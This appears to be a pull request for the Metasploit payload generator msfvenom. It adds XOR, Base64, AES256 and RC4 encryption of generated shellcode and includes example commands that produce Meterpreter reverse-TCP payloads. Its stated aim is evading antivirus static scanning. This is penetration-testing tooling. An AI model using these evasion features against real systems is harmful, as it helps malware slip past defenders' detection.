### PR TITLE
Add support for shellcode encryption for msfvenom

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -187,7 +187,6 @@ GEM
       mini_portile2 (~> 2.3.0)
     octokit (4.8.0)
       sawyer (~> 0.8.0, >= 0.5.3)
-    openssl (2.1.0)
     openssl-ccm (1.2.1)
     openvas-omp (0.0.4)
     packetfu (1.1.13)
@@ -277,8 +276,6 @@ GEM
       rex-text
     rex-struct2 (0.1.2)
     rex-text (0.2.18)
-      openssl
-      ruby-rc4
     rex-zip (0.1.3)
       rex-text
     rkelly-remix (0.0.7)

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -187,6 +187,7 @@ GEM
       mini_portile2 (~> 2.3.0)
     octokit (4.8.0)
       sawyer (~> 0.8.0, >= 0.5.3)
+    openssl (2.1.0)
     openssl-ccm (1.2.1)
     openvas-omp (0.0.4)
     packetfu (1.1.13)

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -187,6 +187,7 @@ GEM
       mini_portile2 (~> 2.3.0)
     octokit (4.8.0)
       sawyer (~> 0.8.0, >= 0.5.3)
+    openssl (2.1.0)
     openssl-ccm (1.2.1)
     openvas-omp (0.0.4)
     packetfu (1.1.13)
@@ -275,7 +276,9 @@ GEM
       rex-socket
       rex-text
     rex-struct2 (0.1.2)
-    rex-text (0.2.17)
+    rex-text (0.2.18)
+      openssl
+      ruby-rc4
     rex-zip (0.1.3)
       rex-text
     rkelly-remix (0.0.7)

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -276,6 +276,8 @@ GEM
       rex-text
     rex-struct2 (0.1.2)
     rex-text (0.2.18)
+      openssl
+      ruby-rc4
     rex-zip (0.1.3)
       rex-text
     rkelly-remix (0.0.7)

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -187,7 +187,6 @@ GEM
       mini_portile2 (~> 2.3.0)
     octokit (4.8.0)
       sawyer (~> 0.8.0, >= 0.5.3)
-    openssl (2.1.0)
     openssl-ccm (1.2.1)
     openvas-omp (0.0.4)
     packetfu (1.1.13)
@@ -276,9 +275,7 @@ GEM
       rex-socket
       rex-text
     rex-struct2 (0.1.2)
-    rex-text (0.2.18)
-      openssl
-      ruby-rc4
+    rex-text (0.2.20)
     rex-zip (0.1.3)
       rex-text
     rkelly-remix (0.0.7)

--- a/lib/msf/base/simple/buffer.rb
+++ b/lib/msf/base/simple/buffer.rb
@@ -18,8 +18,12 @@ module Buffer
   # Serializes a buffer to a provided format.  The formats supported are raw,
   # num, dword, ruby, python, perl, bash, c, js_be, js_le, java and psh
   #
-  def self.transform(buf, fmt = "ruby", var_name = 'buf')
+  def self.transform(buf, fmt = "ruby", var_name = 'buf', encryption_opts={})
     default_wrap = 60
+
+    unless encryption_opts.empty?
+      buf = encrypt_buffer(buf, encryption_opts)
+    end
 
     case fmt
       when 'raw'
@@ -118,6 +122,36 @@ module Buffer
       'vbapplication',
       'vbscript'
     ]
+  end
+
+  def self.encryption_formats
+    [
+      'xor',
+      'base64',
+      'aes256',
+      'rc4'
+    ]
+  end
+
+  private
+
+  def self.encrypt_buffer(value, encryption_opts)
+    buf = ''
+
+    case encryption_opts[:format]
+    when 'aes256'
+      buf = Rex::Text.encrypt_aes256(encryption_opts[:iv], encryption_opts[:key], value)
+    when 'base64'
+      buf = Rex::Text.encode_base64(value)
+    when 'xor'
+      buf = Rex::Text.xor(encryption_opts[:key], value)
+    when 'rc4'
+      buf = Rex::Text.rc4(encryption_opts[:key], value)
+    else
+      raise ArgumentError, "Unsupported encryption format: #{encryption_opts[:format]}", caller
+    end
+
+    return buf
   end
 
 end

--- a/lib/msf/base/simple/buffer.rb
+++ b/lib/msf/base/simple/buffer.rb
@@ -146,7 +146,7 @@ module Buffer
         raise ArgumentError, 'Encryption key is missing'
       end
 
-      buf = Rex::Text.encrypt_aes256(encryption_opts[:iv], encryption_opts[:key], value)
+      buf = Rex::Crypto.encrypt_aes256(encryption_opts[:iv], encryption_opts[:key], value)
     when 'base64'
       buf = Rex::Text.encode_base64(value)
     when 'xor'
@@ -160,7 +160,7 @@ module Buffer
         raise ArgumentError, 'Encryption key is missing'
       end
 
-      buf = Rex::Text.rc4(encryption_opts[:key], value)
+      buf = Rex::Crypto.rc4(encryption_opts[:key], value)
     else
       raise ArgumentError, "Unsupported encryption format: #{encryption_opts[:format]}", caller
     end

--- a/lib/msf/base/simple/buffer.rb
+++ b/lib/msf/base/simple/buffer.rb
@@ -140,12 +140,26 @@ module Buffer
 
     case encryption_opts[:format]
     when 'aes256'
+      if encryption_opts[:iv].blank?
+        raise ArgumentError, 'Initialization vector is missing'
+      elsif encryption_opts[:key].blank?
+        raise ArgumentError, 'Encryption key is missing'
+      end
+
       buf = Rex::Text.encrypt_aes256(encryption_opts[:iv], encryption_opts[:key], value)
     when 'base64'
       buf = Rex::Text.encode_base64(value)
     when 'xor'
+      if encryption_opts[:key].blank?
+        raise ArgumentError, 'XOR key is missing'
+      end
+
       buf = Rex::Text.xor(encryption_opts[:key], value)
     when 'rc4'
+      if encryption_opts[:key].blank?
+        raise ArgumentError, 'Encryption key is missing'
+      end
+
       buf = Rex::Text.rc4(encryption_opts[:key], value)
     else
       raise ArgumentError, "Unsupported encryption format: #{encryption_opts[:format]}", caller

--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -83,6 +83,15 @@ module Msf
     # @!attribute  var_name
     #   @return [String] The custom variable string for certain output formats
     attr_accessor :var_name
+    # @!attribute encryption_format
+    #   @return [String] The encryption format to use for the shellcode.
+    attr_accessor :encryption_format
+    # @!attribute encryption_key
+    #   @return [String] The key to use for the encryption
+    attr_accessor :encryption_key
+    # @!attribute encryption_iv
+    #   @return [String] The initialization vector for the encryption (not all apply)
+    attr_accessor :encryption_iv
 
 
     # @param opts [Hash] The options hash
@@ -123,6 +132,9 @@ module Msf
       @var_name   = opts.fetch(:var_name, 'buf')
       @smallest   = opts.fetch(:smallest, false)
       @encoder_space = opts.fetch(:encoder_space, @space)
+      @encryption_format = opts.fetch(:encryption_format, 'base64')
+      @encryption_key = opts.fetch(:encryption_key, '')
+      @encryption_iv = opts.fetch(:encryption_iv, '')
 
       @framework  = opts.fetch(:framework)
 
@@ -276,15 +288,21 @@ module Msf
     # @param shellcode [String] the processed shellcode to be formatted
     # @return [String] The final formatted form of the payload
     def format_payload(shellcode)
+      encryption_opts = {
+        format: encryption_format,
+        iv: encryption_iv,
+        key: encryption_key
+      }
+
       case format.downcase
         when "js_be"
           if Rex::Arch.endian(arch) != ENDIAN_BIG
             raise IncompatibleEndianess, "Big endian format selected for a non big endian payload"
           else
-            ::Msf::Simple::Buffer.transform(shellcode, format, @var_name)
+            ::Msf::Simple::Buffer.transform(shellcode, format, @var_name, encryption_opts)
           end
         when *::Msf::Simple::Buffer.transform_formats
-          ::Msf::Simple::Buffer.transform(shellcode, format, @var_name)
+          ::Msf::Simple::Buffer.transform(shellcode, format, @var_name, encryption_opts)
         when *::Msf::Util::EXE.to_executable_fmt_formats
           ::Msf::Util::EXE.to_executable_fmt(framework, arch, platform_list, shellcode, format, exe_options)
         else

--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -132,9 +132,9 @@ module Msf
       @var_name   = opts.fetch(:var_name, 'buf')
       @smallest   = opts.fetch(:smallest, false)
       @encoder_space = opts.fetch(:encoder_space, @space)
-      @encryption_format = opts.fetch(:encryption_format, 'base64')
-      @encryption_key = opts.fetch(:encryption_key, '')
-      @encryption_iv = opts.fetch(:encryption_iv, '')
+      @encryption_format = opts.fetch(:encryption_format, nil)
+      @encryption_key = opts.fetch(:encryption_key, nil)
+      @encryption_iv = opts.fetch(:encryption_iv, nil)
 
       @framework  = opts.fetch(:framework)
 
@@ -288,11 +288,10 @@ module Msf
     # @param shellcode [String] the processed shellcode to be formatted
     # @return [String] The final formatted form of the payload
     def format_payload(shellcode)
-      encryption_opts = {
-        format: encryption_format,
-        iv: encryption_iv,
-        key: encryption_key
-      }
+      encryption_opts = {}
+      encryption_opts[:format] = encryption_format if encryption_format
+      encryption_opts[:iv] = encryption_iv if encryption_iv
+      encryption_opts[:key] = encryption_key if encryption_key
 
       case format.downcase
         when "js_be"

--- a/lib/rex.rb
+++ b/lib/rex.rb
@@ -114,6 +114,10 @@ require 'rex/compat'
 require 'rex/sslscan/scanner'
 require 'rex/sslscan/result'
 
+# Cryptography
+require 'rex/crypto/aes256'
+require 'rex/crypto/rc4'
+
 
 # Overload the Kernel.sleep() function to be thread-safe
 Kernel.class_eval("

--- a/lib/rex/crypto/aes256.rb
+++ b/lib/rex/crypto/aes256.rb
@@ -1,0 +1,33 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Crypto
+
+    # Returns an encrypted string using AES256-CBC.
+    #
+    # @param iv [String] Initialization vector.
+    # @param key [String] Secret key.
+    # @return [String] The encrypted string.
+    def self.encrypt_aes256(iv, key, value)
+      aes = OpenSSL::Cipher::AES256.new(:CBC)
+      aes.encrypt
+      aes.iv = iv
+      aes.key = key
+      aes.update(value) + aes.final
+    end
+
+    # Returns a decrypted string using AES256-CBC.
+    #
+    # @param iv [String] Initialization vector.
+    # @param key [String] Secret key.
+    # @return [String] The decrypted string.
+    def self.decrypt_aes256(iv, key, value)
+      aes = OpenSSL::Cipher::AES256.new(:CBC)
+      aes.decrypt
+      aes.iv = iv
+      aes.key = key
+      aes.update(value) + aes.final
+    end
+
+  end
+end

--- a/lib/rex/crypto/rc4.rb
+++ b/lib/rex/crypto/rc4.rb
@@ -1,0 +1,18 @@
+# -*- coding: binary -*-
+
+module Rex
+  module Crypto
+
+    # Returns a decrypted or encrypted RC4 string.
+    #
+    # @param key [String] Secret key.
+    # @param [String]
+    def self.rc4(key, value)
+      rc4 = RC4.new(key)
+
+      # This can also be used to decrypt
+      rc4.encrypt(value)
+    end
+
+  end
+end

--- a/lib/rex/crypto/rc4.rb
+++ b/lib/rex/crypto/rc4.rb
@@ -1,5 +1,7 @@
 # -*- coding: binary -*-
 
+require 'rc4'
+
 module Rex
   module Crypto
 

--- a/modules/payloads/singles/windows/exec.rb
+++ b/modules/payloads/singles/windows/exec.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/exec'
 ###
 #
 # Executes a command on the target machine
-#
+#w
 ###
 module MetasploitModule
 

--- a/modules/payloads/singles/windows/exec.rb
+++ b/modules/payloads/singles/windows/exec.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/exec'
 ###
 #
 # Executes a command on the target machine
-#w
+#
 ###
 module MetasploitModule
 

--- a/msfvenom
+++ b/msfvenom
@@ -351,7 +351,7 @@ if generator_opts[:list_options]
   $stderr.puts "Advanced options for #{payload_mod.fullname}:\n\n"
   $stdout.puts ::Msf::Serializer::ReadableText.dump_advanced_options(payload_mod, '    ')
 
-  $stderr.puts "encrypt options for #{payload_mod.fullname}:\n\n"
+  $stderr.puts "Encryption options for #{payload_mod.fullname}:\n\n"
   $stdout.puts ::Msf::Serializer::ReadableText.dump_encrypt_options(payload_mod, '    ')
   exit(0)
 end

--- a/msfvenom
+++ b/msfvenom
@@ -106,7 +106,7 @@ def parse_args(args)
     raise HelpError, msg
   end
 
-  opt.on('--encryptor       <value>', String, 'The type of encryptor or encoder to use for the shellcode') do |e|
+  opt.on('--encrypt         <value>', String, 'The type of encryption or encoding to apply to the shellcode') do |e|
     opts[:encryption_format] = e
   end
 

--- a/msfvenom
+++ b/msfvenom
@@ -121,7 +121,7 @@ def parse_args(args)
     opts[:encryption_key] = e
   end
 
-  opt.on('--encrypt-iv      <value>', String, 'An init vector for the encryption') do |e|
+  opt.on('--encrypt-iv      <value>', String, 'An initialization vector for the encryption') do |e|
     opts[:encryption_iv] = e
   end
 

--- a/msfvenom
+++ b/msfvenom
@@ -63,12 +63,13 @@ def parse_args(args)
   opt = OptionParser.new
   banner = "MsfVenom - a Metasploit standalone payload generator.\n"
   banner << "Also a replacement for msfpayload and msfencode.\n"
-  banner << "Usage: #{$0} [options] <var=val>"
+  banner << "Usage: #{$0} [options] <var=val>\n"
+  banner << "Example: #{$0} -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe"
   opt.banner = banner
   opt.separator('')
   opt.separator('Options:')
 
-  opt.on('-p', '--payload       <payload>', String,
+  opt.on('-p', '--payload         <payload>', String,
          'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p|
     if p == '-'
       opts[:payload] = 'stdin'
@@ -81,18 +82,18 @@ def parse_args(args)
     opts[:list_options] = true
   end
 
-  opt.on('-l', '--list          [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l|
+  opt.on('-l', '--list            [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l|
     if l.nil? or l.empty?
       l = ["all"]
     end
     opts[:list] = l
   end
 
-  opt.on('-n', '--nopsled       <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n|
+  opt.on('-n', '--nopsled         <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n|
     opts[:nops] = n.to_i
   end
 
-  opt.on('-f', '--format        <format>', String, "Output format (use --help-formats for a list)") do |f|
+  opt.on('-f', '--format          <format>', String, "Output format (use --help-formats for a list)") do |f|
     opts[:format] = f
   end
 
@@ -105,15 +106,34 @@ def parse_args(args)
     raise HelpError, msg
   end
 
-  opt.on('-e', '--encoder       <encoder>', String, 'The encoder to use') do |e|
+  opt.on('--encryptor       <value>', String, 'The type of encryptor or encoder to use for the shellcode') do |e|
+    opts[:encryption_format] = e
+  end
+
+  opt.on('--encrypt-formats', String, 'List Available encryption formats') do
+    init_framework(:module_types => [])
+    msg = "Encryption formats:\n" +
+          "\t" + ::Msf::Simple::Buffer.encryption_formats.join(", ")
+    raise HelpError, msg
+  end
+
+  opt.on('--encrypt-key     <value>', String, 'A key to be used for the encryptor') do |e|
+    opts[:encryption_key] = e
+  end
+
+  opt.on('--encrypt_iv      <value>', String, 'An init vector for the encryption') do |e|
+    opts[:encryption_iv] = e
+  end
+
+  opt.on('-e', '--encoder         <encoder>', String, 'The encoder to use') do |e|
     opts[:encoder] = e
   end
 
-  opt.on('-a', '--arch          <arch>', String, 'The architecture to use') do |a|
+  opt.on('-a', '--arch            <arch>', String, 'The architecture to use') do |a|
     opts[:arch] = a
   end
 
-  opt.on('--platform      <platform>', String, 'The platform of the payload') do |l|
+  opt.on('--platform        <platform>', String, 'The platform of the payload') do |l|
     opts[:platform] = l
   end
 
@@ -126,28 +146,28 @@ def parse_args(args)
     raise HelpError, msg
   end
 
-  opt.on('-s', '--space         <length>', Integer, 'The maximum size of the resulting payload') do |s|
+  opt.on('-s', '--space           <length>', Integer, 'The maximum size of the resulting payload') do |s|
     opts[:space] = s
   end
 
-  opt.on('--encoder-space <length>', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s|
+  opt.on('--encoder-space   <length>', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s|
     opts[:encoder_space] = s
   end
 
-  opt.on('-b', '--bad-chars     <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b|
+  opt.on('-b', '--bad-chars       <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b|
     init_framework()
     opts[:badchars] = Rex::Text.hex_to_raw(b)
   end
 
-  opt.on('-i', '--iterations    <count>', Integer, 'The number of times to encode the payload') do |i|
+  opt.on('-i', '--iterations      <count>', Integer, 'The number of times to encode the payload') do |i|
     opts[:iterations] = i
   end
 
-  opt.on('-c', '--add-code      <path>', String, 'Specify an additional win32 shellcode file to include') do |x|
+  opt.on('-c', '--add-code        <path>', String, 'Specify an additional win32 shellcode file to include') do |x|
     opts[:add_code] = x
   end
 
-  opt.on('-x', '--template      <path>', String, 'Specify a custom executable file to use as a template') do |x|
+  opt.on('-x', '--template        <path>', String, 'Specify a custom executable file to use as a template') do |x|
     opts[:template] = x
   end
 
@@ -155,11 +175,11 @@ def parse_args(args)
     opts[:keep] = true
   end
 
-  opt.on('-o', '--out           <path>', 'Save the payload') do |x|
+  opt.on('-o', '--out             <path>', 'Save the payload') do |x|
     opts[:out] = x
   end
 
-  opt.on('-v', '--var-name      <name>', String, 'Specify a custom variable name to use for certain output formats') do |x|
+  opt.on('-v', '--var-name        <name>', String, 'Specify a custom variable name to use for certain output formats') do |x|
     opts[:var_name] = x
   end
 
@@ -331,8 +351,8 @@ if generator_opts[:list_options]
   $stderr.puts "Advanced options for #{payload_mod.fullname}:\n\n"
   $stdout.puts ::Msf::Serializer::ReadableText.dump_advanced_options(payload_mod, '    ')
 
-  $stderr.puts "Evasion options for #{payload_mod.fullname}:\n\n"
-  $stdout.puts ::Msf::Serializer::ReadableText.dump_evasion_options(payload_mod, '    ')
+  $stderr.puts "encrypt options for #{payload_mod.fullname}:\n\n"
+  $stdout.puts ::Msf::Serializer::ReadableText.dump_encrypt_options(payload_mod, '    ')
   exit(0)
 end
 

--- a/msfvenom
+++ b/msfvenom
@@ -121,7 +121,7 @@ def parse_args(args)
     opts[:encryption_key] = e
   end
 
-  opt.on('--encrypt_iv      <value>', String, 'An init vector for the encryption') do |e|
+  opt.on('--encrypt-iv      <value>', String, 'An init vector for the encryption') do |e|
     opts[:encryption_iv] = e
   end
 

--- a/spec/lib/msf/core/payload_generator_spec.rb
+++ b/spec/lib/msf/core/payload_generator_spec.rb
@@ -1056,7 +1056,7 @@ RSpec.describe Msf::PayloadGenerator do
         }
       }
       it 'applies the appropriate transform format' do
-        expect(::Msf::Simple::Buffer).to receive(:transform).with(shellcode, 'c', 'buf'. {})
+        expect(::Msf::Simple::Buffer).to receive(:transform).with(shellcode, 'c', 'buf', {})
         payload_generator.format_payload(shellcode)
       end
     end

--- a/spec/lib/msf/core/payload_generator_spec.rb
+++ b/spec/lib/msf/core/payload_generator_spec.rb
@@ -1056,7 +1056,7 @@ RSpec.describe Msf::PayloadGenerator do
         }
       }
       it 'applies the appropriate transform format' do
-        expect(::Msf::Simple::Buffer).to receive(:transform).with(shellcode, 'c', 'buf')
+        expect(::Msf::Simple::Buffer).to receive(:transform).with(shellcode, 'c', 'buf'. {})
         payload_generator.format_payload(shellcode)
       end
     end

--- a/spec/lib/rex/crypto/aes256_spec.rb
+++ b/spec/lib/rex/crypto/aes256_spec.rb
@@ -1,0 +1,62 @@
+require 'spec_helper'
+require 'securerandom'
+
+
+describe Rex::Crypto do
+
+    let(:iv) {
+      SecureRandom.random_bytes(16)
+    }
+
+    let(:key) {
+      SecureRandom.random_bytes(32)
+    }
+
+    let(:value) {
+      'Hello World'
+    }
+
+  describe '#encrypt_aes256' do
+    it 'raises an exception due to a short IV' do
+      iv = SecureRandom.random_bytes(1)
+      # Because it could raise either a OpenSSL::Cipher::CipherError or an ArgumentError
+      # dependong on the environment, we will just expect it to raise an exception
+      expect { Rex::Crypto.encrypt_aes256(iv, key, value) }.to raise_exception
+    end
+
+    it 'raises an exception due to a short key' do
+      key = SecureRandom.random_bytes(1)
+      # Because it could raise either a OpenSSL::Cipher::CipherError or an ArgumentError
+      # dependong on the environment, we will just expect it to raise an exception
+      expect { Rex::Crypto.encrypt_aes256(iv, key, value) }.to raise_exception
+    end
+
+    it 'encrypts the string Hello World' do
+      encrypted_str = Rex::Crypto.encrypt_aes256(iv, key, value)
+      expect(encrypted_str).not_to eq(value)
+    end
+  end
+
+  describe '#decrypt_aes256' do
+    it 'raises an exception due to a short IV' do
+      iv = SecureRandom.random_bytes(1)
+      # Because it could raise either a OpenSSL::Cipher::CipherError or an ArgumentError
+      # dependong on the environment, we will just expect it to raise an exception
+      expect { Rex::Crypto.decrypt_aes256(iv, key, value) }.to raise_exception
+    end
+
+    it 'raises an exception due to a short key' do
+      key = SecureRandom.random_bytes(1)
+      # Because it could raise either a OpenSSL::Cipher::CipherError or an ArgumentError
+      # dependong on the environment, we will just expect it to raise an exception
+      expect { Rex::Crypto.decrypt_aes256(iv, key, value) }.to raise_exception
+    end
+
+    it 'decrypts the value to Hello World' do
+      encrypted_str = Rex::Crypto.encrypt_aes256(iv, key, value)
+      decrypted_str = Rex::Crypto.decrypt_aes256(iv, key, encrypted_str)
+      expect(decrypted_str).to eq(value)
+    end
+  end
+
+end

--- a/spec/lib/rex/crypto/aes256_spec.rb
+++ b/spec/lib/rex/crypto/aes256_spec.rb
@@ -2,7 +2,7 @@ require 'spec_helper'
 require 'securerandom'
 
 
-describe Rex::Crypto do
+RSpec.describe Rex::Crypto do
 
     let(:iv) {
       SecureRandom.random_bytes(16)

--- a/spec/lib/rex/crypto/rc4_spec.rb
+++ b/spec/lib/rex/crypto/rc4_spec.rb
@@ -1,0 +1,28 @@
+require 'spec_helper'
+require 'securerandom'
+
+
+describe Rex::Crypto do
+
+  describe '#rc4' do
+
+    let(:key) {
+      SecureRandom.random_bytes(32)
+    }
+
+    let(:value) {
+      'Hello World'
+    }
+
+    it 'encrypts a string' do
+      expect(Rex::Crypto.rc4(key, value)).not_to eq(value)
+    end
+
+    it 'decrypts a string' do
+      encrypted_str = Rex::Crypto.rc4(key, value)
+      decrypted_str = Rex::Crypto.rc4(key, encrypted_str)
+      expect(decrypted_str).to eq(value)
+    end
+
+  end
+end

--- a/spec/lib/rex/crypto/rc4_spec.rb
+++ b/spec/lib/rex/crypto/rc4_spec.rb
@@ -2,7 +2,7 @@ require 'spec_helper'
 require 'securerandom'
 
 
-describe Rex::Crypto do
+RSpec.describe Rex::Crypto do
 
   describe '#rc4' do
 


### PR DESCRIPTION
# Description

This PR allows the user to encrypt the payload when using a transform format. The purpose of this is because shellcodes are easily detectable by antivirus, so having it encrypted provides an extra layer of stealth. For example, when you generate windows/meterpreter/reverse_tcp in the C format, save it as a C file, and compile it, it gets flagged immediately when you simply put it on disk. Having it encrypted, however, will not trigger that. Keep in mind this does not completely defeat AV of course, but it sure is effective against static scanning.

As an user, you can use this to generate an encrypted version of the shellcode, and then you have to come up with your own decrypting routine and loader so you can use your shellcode. 

# Verification steps

## The Help Menu

- [x] Do ```ruby msfvenom -h```, you should see four new options: ```--encrypt```, ```--encrypt-formats```,  ```--encrypt-key```, and ```--encrypt-iv```.
- [x] Do ```ruby msfvenom --encrypt-formats```, and you should see these new encryption formats: XOR, Base64, AES256, and RC4.

## Using the AES256 Encryption

- [x] Do ```ruby msfvenom -p windows/meterpreter/reverse_tcp --encrypt aes256 --encrypt-iv pfqtFwxjuXDWvSLa --encrypt-key RSzOOFJkXBjQSvSckAEWcurDaZBSZYJc -f c```, it should generate the encrypted shellcode in C
- [x] Open ```msfconsole```, and switch to ```irb```
- [x] Do: ```Rex::Crypto.decrypt_aes256('pfqtFwxjuXDWvSLa', 'RSzOOFJkXBjQSvSckAEWcurDaZBSZYJc', encrypted_string)```, you should be able to decrypt it

## Using XOR

- [x] Do: ```ruby msfvenom -p windows/meterpreter/reverse_tcp --encrypt xor --encrypt-key "\x0f" -f c```, and it should generate the encoded shellcode in C
- [x] In `irb`, do ```Rex::Text.xor(0x0f, xor_string)```, and you should be able to XOR the string back

## Using the RC4 Encryption

- [x] Do: ```ruby msfvenom -p windows/meterpreter/reverse_tcp --encrypt rc4 --encrypt-key pfqtFwxjuX -f c```, and it should generate the encrypted shellcode in C
- [x] In `irb`, do `Rex::Crypto.rc4("pfqtFwxjuX", encrypted_string)`, and you should be able to XOR back.

## Using the Base64 encoding

- [x] Do: ```ruby msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64```, and it should generate the shellcode in Base64.
- [x] In `irb`, do `Rex::Text.decode_base64(b64_string)`, and you should be able to decode back.